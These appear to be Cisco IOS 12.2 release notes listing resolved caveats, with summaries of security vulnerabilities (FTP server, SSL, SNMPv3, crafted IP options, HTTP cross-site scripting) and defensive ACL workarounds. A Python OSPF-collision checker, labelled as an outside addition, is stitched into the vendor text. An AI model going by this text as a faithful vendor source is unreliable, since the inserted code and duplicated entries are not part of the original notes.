Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.

The Cisco IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the Cisco IOS FTP Server service are unaffected by these vulnerabilities.

This vulnerability does not apply to the Cisco IOS FTP Client feature.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.

Resolved Caveats—Cisco IOS Release 12.2(40a)

Cisco IOS Release 12.2(40a) is a rebuild release for Cisco IOS Release 12.2(40). The caveats in this section are resolved in Cisco IOS Release 12.2(40a) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCeg62070

Symptoms: Tracebacks or crash are seen during HTTP transactions with long URLs.

Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.

Workaround: Disable HTTP server using the no ip http server command.

CSCse04560

Symptoms: A tftp client trying to transfer a file from a Cisco IOS device configured as a tftp server, and which is denied by an ACL, receives a different result depending on whether the file is being offered for download or not. This may allow a third party to enumerate which files are available for download.

Conditions: The tftp-server command is configured on the device and an ACL restricting access to the file in question has been applied as in this example:

tftp-server flash:filename1 access-list-number
access-list access-list-number permit 192.168.1.0 0.0.0.255
access-list access-list-number deny any

Workaround: The following workarounds can be applied:

1. Interface ACL: Configure and attach an access list to every router interface that is active and configured for IP packet processing. Example:

access-list access-list-number remark --- the following hosts and networks are ALLOWED for TFTP access
access-list access-list-number permit udp host source_1 host interface_address_1 eq 69
access-list access-list-number permit udp host source_2 host interface_address_2 eq 69
access-list access-list-number permit udp source source-wildcard host interface_address_1 eq 69
access-list access-list-number permit udp source source-wildcard host interface_address_2 eq 69
access-list access-list-number remark --- everyone else is DENIED for TFTP access
access-list access-list-number deny udp any host interface_address_1 eq 69
access-list access-list-number deny udp any host interface_address_2 eq 69
access-list access-list-number remark --- any other traffic to/through the router is allowed
access-list access-list-number permit ip any any

interface Ethernet0/0
 ip access-group access-list-number in

Because the tftp server in Cisco IOS, once enabled, listens by default on all interfaces enabled for IP processing, the access list needs to deny traffic to each and every IP address assigned to any active router interface.

2. Control Plane Policing: Configure and apply a CoPP policy. For example:

access-list access-list-number remark --- Do not police TFTP traffic from trusted hosts and networks
access-list access-list-number deny udp host source_1 any eq 69
access-list access-list-number deny udp source source-wildcard any eq 69
access-list access-list-number remark --- Police TFTP traffic from untrusted hosts and networks
access-list access-list-number permit udp any any eq 69
access-list access-list-number remark --- Do not police any other traffic going to the router
access-list access-list-number deny ip any any

class-map match-all tftp-class
 match access-group access-list-number

policy-map control-plane-policy
 ! Drop all traffic that matches the class tftp-class
 class tftp-class
  drop

control-plane
 service-policy input control-plane-policy

Note: CoPP is only available on certain platforms and Cisco IOS releases. Additional information on the configuration and use of the CoPP feature can be found at the following URL: http://www.cisco.com/en/US/products/sw/iosswrel/ps1838/products_white_paper09186a0080211f39.shtml

3. Infrastructure ACLs (iACL): Although it is often difficult to block traffic transiting your network, it is possible to identify traffic that should never be allowed to target your infrastructure devices and to block that traffic at the border of your network. Infrastructure ACLs are considered a network security best practice and should be considered as a long-term addition to good network security as well as a workaround for this specific vulnerability. The white paper entitled "Protecting Your Core: Infrastructure Protection Access Control Lists" presents guidelines and recommended deployment techniques for iACLs: http://www.cisco.com/warp/public/707/iacl.html

4. Configuring Receive Access Lists (rACLs): For distributed platforms, rACLs may be an option starting in Cisco IOS Release 12.0(21)S2 for the Cisco 12000 series GSR and Cisco IOS Release 12.0(24)S for the Cisco 7500 series. Receive access lists protect the device from harmful traffic before the traffic can impact the route processor. Receive path ACLs are considered a network security best practice, and should be considered as a long-term addition to good network security, as well as a workaround for this specific vulnerability. The CPU load is distributed to the line card processors, which helps mitigate load on the main route processor. The white paper entitled "GSR: Receive Access Control Lists" will help identify and allow legitimate traffic to your device and deny all unwanted packets: http://www.cisco.com/warp/public/707/racl.html

NOTE: The suggested workarounds are an "all or nothing" solution. While the tftp-server feature in Cisco IOS allows per-file ACLs to be attached to every file being offered for download, the suggested workarounds are global and will either prevent or allow access to all files being shared. It is recommended to apply the suggested workarounds in addition to the existing per-file ACLs, instead of replacing them.

CSCsg70355

Symptoms: Starting in calendar year 2007, daylight savings summer-time rules may cause Cisco IOS to generate timestamps (such as in syslog messages) that are off by one hour.

Conditions: The Cisco IOS configuration command:

clock summer-time zone recurring

uses United States standards for daylight savings time rules by default. The Energy Policy Act of 2005 (H.R.6.ENR), Section 110 changes the start date from the first Sunday of April to the second Sunday of March. It changes the end date from the last Sunday of October to the first Sunday of November.

Workaround: A workaround is possible by using the clock summer-time configuration command to manually configure the proper start date and end date for daylight savings time. After the summer-time period for calendar year 2006 is over, one can for example configure:

clock summer-time PDT recurring 2 Sun Mar 2:00 1 Sun Nov 2:00

(This example is for the US/Pacific time zone.)

Not A Workaround: Using NTP is not a workaround to this problem. NTP does not carry any information about timezones or summertime.

IBM Connectivity

CSCsf28840

A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.

There are workarounds available for this vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml

Miscellaneous

CSCeb21064

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsb12598

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.


Note Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml.


A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsb40304

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.


Note Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml.


A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsd81407

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsd92405

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.


Note Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml.


A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsg16908

Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.

The Cisco IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the Cisco IOS FTP Server service are unaffected by these vulnerabilities.

This vulnerability does not apply to the Cisco IOS FTP Client feature.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.

TCP/IP Host-Mode Services

CSCse05736

Symptoms: A router that is running RCP can be reloaded by a specific packet.

Conditions: This symptom is seen under the following conditions:

The router must have RCP enabled.

The packet must come from the source address of the designated system configured to send RCP packets to the router.

The packet must have a specific data content.

Workaround: Put access lists on the edge of your network blocking RCP packets to prevent spoofed RSH packets. Use another protocol such as SCP. Use VTY ACLs.

Resolved Caveats—Cisco IOS Release 12.2(40)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(40). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(40). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCse85200

Specifically crafted CDP packets can cause a router to allocate and keep extra memory. Exploitation of this behavior by sending multiple specifically crafted CDP packets could cause memory allocation problems on the router.

Since CDP is a layer-2 protocol, this issue can only be triggered by systems that are residing on the same network segment.

Workaround: Disable CDP on interfaces where it is not necessary.

Miscellaneous

CSCsd80754

Symptoms: The active router in an HSRP configuration may not respond to an ARP request for the virtual IP address. When the symptom occurs, both routers in the HSRP configuration have correct HSRP and ARP entries. Entering the clear arp command on the standby router in the HSRP configuration does not resolve the problem.

Conditions: This symptom is observed when the same HSRP virtual IP address exists in different HSRP groups on different routers.

Workaround: Enter the no standby redirects command to prevent the symptom from occurring.

CSCse68138

Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:

Session Initiation Protocol (SIP)

Media Gateway Control Protocol (MGCP)

Signaling protocols H.323, H.254

Real-time Transport Protocol (RTP)

Facsimile reception

Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.

There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml

CSCsf04754

Multiple Cisco products contain either of two authentication vulnerabilities in the Simple Network Management Protocol version 3 (SNMPv3) feature. These vulnerabilities can be exploited when processing a malformed SNMPv3 message. These vulnerabilities could allow the disclosure of network information or may enable an attacker to perform configuration changes to vulnerable devices. The SNMP server is an optional service that is disabled by default. Only SNMPv3 is impacted by these vulnerabilities. Workarounds are available for mitigating the impact of the vulnerabilities described in this document.

The United States Computer Emergency Response Team (US-CERT) has assigned Vulnerability Note VU#878044 to these vulnerabilities.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0960 has been assigned to these vulnerabilities.

This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml

CSCuk57037

Symptoms: A router may crash when a serial interface of a neighboring router is brought up.

Conditions: This symptom is observed on a Cisco router that runs a Cisco IOS software image that is earlier than Release 12.4(8) and that is configured for IP Multicast when some interfaces on the router are configured for PIM. The symptom occurs when the serial interface that is brought up on the neighboring router is configured for PIM and the connecting interface on the Cisco router is not configured for PIM.

Workaround: Depending on the desired operation for the link, either enable PIM at both ends or disable PIM at both ends.

Resolved Caveats—Cisco IOS Release 12.2(37)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(37). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(37). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCef68681

Symptoms: A CBUS complex may occur, causing all VIPs to reload and to be reconfigured. In turn, this situation prevents the router from being accessible for 30 seconds.

Conditions: This symptom is observed on a Cisco 7500 series that runs Cisco IOS Release 12.0S when you change the MTU of an already existing interface or when you add a new interface. The symptom may also occur in other releases.

Workaround: There is no workaround.

CSCeg11566

Symptoms: Intensive SNMP polling may cause the I/O memory of a router to be depleted.

Conditions: This symptom is observed in rare situations.

Workaround: Reduce the SNMP polling interval, frequency, or rate.

CSCej57779

Symptoms: A reload of a Cisco 7600 router with a huge number (for example, 1000) of VRFs configured with BGP/VPN learning redistributed routes may cause some VRFs to not learn distributed routes from the peer.

Conditions: This symptom has been observed in Cisco IOS Release 12.2SRA when a huge number of VRFs are configured. This symptom is not applicable to Cisco IOS Release 12.4.

Workaround: The symptom can be resolved on a per-VRF basis by removing the VRF instance and the BGP/VPN configuration for this instance and then adding them back.

IP Routing Protocols

CSCee36622

Symptoms: ABRs may continue to generate summary LSA(s) for obsolete non-backbone intra-area route(s).

Conditions: This symptom occurs under the following conditions:

1. The ABR (call it ABR X) has at least one non-backbone area (call it Area X) in common with one or more additional ABRs.

2. The ABRs are generating summary LSAs, on behalf of two or more intra-area routes of Area X, into the backbone area and other areas. The two intra-area routes must be advertised as stub links from two different routers; i.e., one from ABR X, and the other from another router belonging to Area X.

3. The summary LSA IDs for the intra-area routes above, when ORed with the host bits of the corresponding masks, yield identical LSA IDs. For example, 10.10.10.128/25 and 10.10.10.0/24 yield identical LSA IDs when the network address is logically ORed with the host bits; i.e.,

10.10.10.128 | 0.0.0.127 = 10.10.10.255
10.10.10.0 | 0.0.0.255 = 10.10.10.255

Workaround: Enter the clear ip ospf proc command on all ABRs that contain the obsolete LSAs.
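As an added check for the conditions above (this is an illustration written for these notes, not part of the release notes or of Cisco IOS), the following Python script computes, for each intra-area prefix, the LSA ID that results from ORing the network address with the host bits of its mask, and reports prefixes whose IDs collide. The route list, the router IDs and the function names are constructed for this illustration. It goes slightly beyond the single example in the text: it handles any prefix length, and it only flags a collision as a candidate for this caveat when the colliding prefixes are advertised by at least two different routers, as condition 2 requires.

```python
"""Find OSPF intra-area prefixes whose summary LSA IDs collide once the
network address is ORed with the host bits of the mask (caveat CSCee36622).

Input: a list of (prefix, advertising_router_id) tuples. The format is an
assumption for this example; gather the real values from your own routing
tables or LSDB as you see fit.
"""
import ipaddress
from collections import defaultdict

# Constructed sample data (not real network addresses): two prefixes from
# different routers collide on 10.10.10.255, two prefixes from the same
# router collide on 172.16.255.255, and the 10.10.20.0 pair does not collide.
SAMPLE_ROUTES = [
    ("10.10.10.0/24", "192.0.2.1"),
    ("10.10.10.128/25", "192.0.2.2"),
    ("10.10.20.0/24", "192.0.2.2"),
    ("10.10.20.0/25", "192.0.2.2"),
    ("172.16.0.0/16", "192.0.2.1"),
    ("172.16.128.0/17", "192.0.2.1"),
]


def lsa_id_with_host_bits(prefix: str) -> str:
    """Return the LSA ID obtained by ORing the network address with the host
    bits of its mask, e.g. 10.10.10.128/25 -> 10.10.10.255."""
    # strict=True raises ValueError if host bits are set in the prefix itself
    net = ipaddress.ip_network(prefix, strict=True)
    return str(ipaddress.ip_address(int(net.network_address) | int(net.hostmask)))


def group_by_host_bit_lsa_id(routes):
    """Group routes by their host-bit LSA ID and keep only groups of two or
    more entries, i.e. the actual collisions (condition 3)."""
    groups = defaultdict(list)
    for prefix, router_id in routes:
        groups[lsa_id_with_host_bits(prefix)].append((prefix, router_id))
    return {lsa_id: members for lsa_id, members in groups.items() if len(members) > 1}


def caveat_candidates(routes):
    """Keep only the collisions whose prefixes come from at least two distinct
    advertising routers (condition 2); same-router collisions are reported
    separately by group_by_host_bit_lsa_id but do not match the caveat."""
    return {
        lsa_id: members
        for lsa_id, members in group_by_host_bit_lsa_id(routes).items()
        if len({router for _, router in members}) > 1
    }


if __name__ == "__main__":
    for lsa_id, members in sorted(caveat_candidates(SAMPLE_ROUTES).items()):
        print(f"LSA ID {lsa_id} is shared by:")
        for prefix, router in members:
            print(f"  {prefix:<18} advertised by {router}")
```

Running the script on the constructed list reports only the 10.10.10.0/24 and 10.10.10.128/25 pair, matching the example in the caveat text; the 172.16.0.0/16 and 172.16.128.0/17 pair collides on the LSA ID but comes from a single router, so it is listed by the grouping function but not as a caveat candidate.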

Miscellaneous

CSCec71950

Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.

Cisco has made free software available to address this vulnerability for affected customers.

There are workarounds available to mitigate the effects of the vulnerability.

This vulnerability was discovered during internal testing. This advisory is available at http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml

CSCef50713

Symptoms: Traffic may be duplicated when it passes through HSRP-enabled interfaces.

Conditions: This symptom is observed on a Cisco 2600 series that is configured with a Fast Ethernet interface that contains an AM79c971 chip when the connected hub is a layer 2 device (not a switch).

Workaround: Replace the hub with a switch or enter the standby use-bia command on the Fast Ethernet interface.

Further Problem Description: When HSRP enters the standby state after the router has reloaded, the Fast Ethernet interface enters non-promiscuous mode. When HSRP becomes active on the router, the Fast Ethernet interface enters promiscuous mode but remains in this mode even when HSRP enters the standby state again.

CSCek26492

Symptoms: A router may crash if it receives a packet with a specific crafted IP option as detailed in Cisco Security Advisory: Crafted IP Option Vulnerability:

http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml

Conditions: This DDTS resolves a symptom of CSCec71950. Cisco IOS releases with this specific DDTS are not at risk of crashing if CSCec71950 has been resolved in the software.

Workaround: Cisco IOS versions with the fix for CSCec71950 are not at risk for this issue and no workaround is required. If CSCec71950 is not resolved, see the following Cisco Security Advisory: Crafted IP Option Vulnerability for workaround information:

http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml

CSCek37177

The Cisco IOS Transmission Control Protocol (TCP) listener in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable memory leak that may lead to a denial of service condition.

This vulnerability only applies to traffic destined to the Cisco IOS device. Traffic transiting the Cisco IOS device will not trigger this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers.

This issue is documented as Cisco bug ID CSCek37177.

There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml

CSCin31767

Symptoms: A Cisco router may reload when you enter the show atm map privileged EXEC command.

Conditions: This symptom is observed on all Cisco routers after you have first deleted a subinterface on which a static map bundle was configured.

Workaround: First remove the static map bundle; then, delete the subinterface.

CSCsc72722

Symptoms: TCP connections that are opened through a Cisco IOS Firewall (CBAC) may not time out.

Conditions: With Cisco IOS Firewall (CBAC) enabled, the TCP idle timer for a session may be reset even by TCP packets that fail TCP inspection and are subsequently dropped. This could lead to the TCP session not timing out.

Workaround: There is no workaround.

CSCsd43501

Symptoms: Voice over Frame Relay (VOFR) Connection PLAR calls that are configured for FXS fail with tracebacks on a Cisco 7200 originating gateway.

Conditions: This issue is seen when the Cisco 7200 gateway is configured with FXS loopstart or ground start signaling.

Workaround: There is no workaround.

CSCsd81861

Symptoms: A router may unexpectedly reload due to a bus error after being reloaded or power cycled. The last console output in the crashinfo will be the ima-group group number command before the crash.

Conditions: The router must have the ip telnet source-interface command or the ip tftp source-interface command configured to use an IMA sub-interface as the source. There also must be at least one ATM interface in the IMA group.

Workaround: Remove the IMA interface from the source interface command in the configuration.

Resolved Caveats—Cisco IOS Release 12.2(34a)

Cisco IOS Release 12.2(34a) is a rebuild release for Cisco IOS Release 12.2(34). The caveats in this section are resolved in Cisco IOS Release 12.2(34a) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Miscellaneous

CSCec71950

Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.

Cisco has made free software available to address this vulnerability for affected customers.

There are workarounds available to mitigate the effects of the vulnerability.

This vulnerability was discovered during internal testing. This advisory is available at http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml

CSCek26492

Symptoms: A router may crash if it receives a packet with a specific crafted IP option as detailed in Cisco Security Advisory: Crafted IP Option Vulnerability:

http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml

Conditions: This DDTS resolves a symptom of CSCec71950. Cisco IOS releases that include this DDTS are not at risk of a crash if CSCec71950 has also been resolved in the software.

Workaround: Cisco IOS versions with the fix for CSCec71950 are not at risk for this issue and no workaround is required. If CSCec71950 is not resolved, see the following Cisco Security Advisory: Crafted IP Option Vulnerability for workaround information:

http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml

CSCse08786

This DDTS documents changes in how IOS handles packets destined to the router or switch.

Resolved Caveats—Cisco IOS Release 12.2(34)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(34). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(34). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCsc64976

A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a show buffers command, will be passed to the browser requesting the page. This HTML code could be interpreted by the client browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected.

Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml.

Interfaces and Bridging

CSCin51588

Symptoms: When you reload the microcode onto an enhanced 8-port multichannel T1/E1 port adapter (PA-MC-8TE1+) while traffic is flowing through the port adapter, the following error message may appear:

%RSP-3-RESTART: interface Serial0/0/4:0, not transmitting

In most cases, the interfaces of the port adapter recover on their own. In very rare cases, the execution of a Cbus Complex occurs.

Conditions: This symptom is observed on a Cisco 7500 series.

Workaround: If the interfaces of the port adapter do not recover on their own, execute a Cbus Complex.

CSCsc61784

Symptoms: The show interface interface stats command output incorrectly shows fastswitched packets as process switched packets.

Conditions: This symptom is observed on a Cisco 7200 platform on T1/E1 interfaces only.

Workaround: There is no workaround. Do not rely on the counters displayed by the show interface interface stats command output.

Miscellaneous

CSCeg67788

Symptoms: The 5-minute output rate in the output of the show interfaces command is incorrect for serial interfaces that are configured on a PA-MC-8TE1+ port adapter.

Conditions: This symptom is observed on a Cisco router that is configured with a PA-MC-8TE1+ port adapter.

Workaround: There is no workaround.

Resolved Caveats—Cisco IOS Release 12.2(32)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(32). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(32). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCea56560

Symptoms: Configuring nonexisting NTP peers repeatedly over a period of time may cause a system reload.

Conditions: This symptom may occur on any Cisco Catalyst switch that is running Cisco IOS software, but it is not platform dependent.

Workaround: Avoid adding/deleting nonexisting NTP peers in quick succession, for example using cut-and-paste.

Interfaces and Bridging

CSCin67809

Symptoms: CEF, dCEF, and fast-switching counters are not accurate on outbound serial E1 or T1 interfaces.

Conditions: This symptom is observed on a Cisco 7200 series when CEF, dCEF, and fast-switching are enabled on a serial E1 or T1 interface.

Workaround: There is no workaround.

Miscellaneous

CSCee20451

Symptoms: A VC may experience an output stuck condition.

Conditions: This symptom occurs when using T1 ATM (the IMA function is not used) on a PA-A3-8T1IMA.

Workaround: Perform the clear interface command.

CSCeh78918

Symptoms: When a line card has reloaded because you reloaded the router, the line card crashed, or you entered a command to reload the line card, the following message may appear on the console:

%MDS-2-RP: MDFS is disabled on some line card(s). Use "show ip mds stats linecard" to view status and "clear ip mds linecard" to reset.

This message may be generated because MDFS is erroneously disabled on the reloaded line card. Erroneous disabling of MDFS may unnecessarily extend network convergence time.

Conditions: This symptom is observed on a distributed router or switch such as a Cisco Catalyst 6000 series, Cisco 7500 series, Cisco 7600 series, Cisco 10000 series, and Cisco 12000 series. The symptom occurs when the router has the ip multicast-routing distributed command enabled for any VRF and when a line card is reloaded more than 50 seconds into the 60-second MDFS flow-control period.

Workaround: The symptom corrects itself after 60 seconds. Alternatively, you can enter the clear ip mds linecard slot number command.

CSCsb11124

The Cisco IOS Stack Group Bidding Protocol (SGBP) feature in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable denial of service condition. Devices that do not support or have not enabled the SGBP protocol are not affected by this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

Cisco has published a Security Advisory on this issue; it is available at http://www.cisco.com/warp/public/707/cisco-sa-20060118-sgbp.shtml

CSCsb18502

Symptoms: Data that is forwarded downstream from a SNASw router is intermittently corrupted. Sniffer traces that are captured upstream and downstream from the SNASw router show that the data that is sent from the host to the SNASw router is fine, but when the data leaves the SNASw router, there are some corrupted bytes at the end of the data stream.

Conditions: This symptom is observed on a SNASw router that is connected upstream to a mainframe host via Enterprise Extender.

Workaround: There is no workaround.

CSCsb99091

Symptoms: An SNA Switch (SNASw) router reloads in snaswitch code in case of memory shortage.

Conditions: This symptom was observed with a router that is concentrating downstream physical units (DSPU) via DLSw/VLDC, and forwarding their traffic via HPR/LLC to the mainframes. There are about 300 to 400 physical units concentrated via the SNASw/DLUR. There are total of 16 routers in this system, with pairs of 8 routers backing up each other.

Workaround: There is no workaround.

CSCsc02139

Symptoms: A router running SNA Switch (SNASw) may reload unexpectedly after logging the following messages:

Sep 13 08:42:45.950 METDST: %SNASW-3-SM_LOG_5: PROBLEM - 287990 - Insufficient storage to activate LU6.2 session
Sep 13 08:42:46.014 METDST: %SNASW-3-SS_LOG_16: PROBLEM - 287994 - CP capabilities exchange failed because of contention winner CP-CP session failure
Sep 13 08:42:47.946 METDST: %SNASW-3-SS_LOG_16: PROBLEM - 288001 - CP capabilities exchange failed because of contention winner CP-CP session failure (Message suppressed 16 times)
Sep 13 08:42:47.946 METDST: %SNASW-3-SM_LOG_5: PROBLEM - 287991 - Insufficient storage to activate LU6.2 session (Message suppressed 109 times)

TLB (load or instruction fetch) exception, CPU signal 10, PC = 0x61327E00

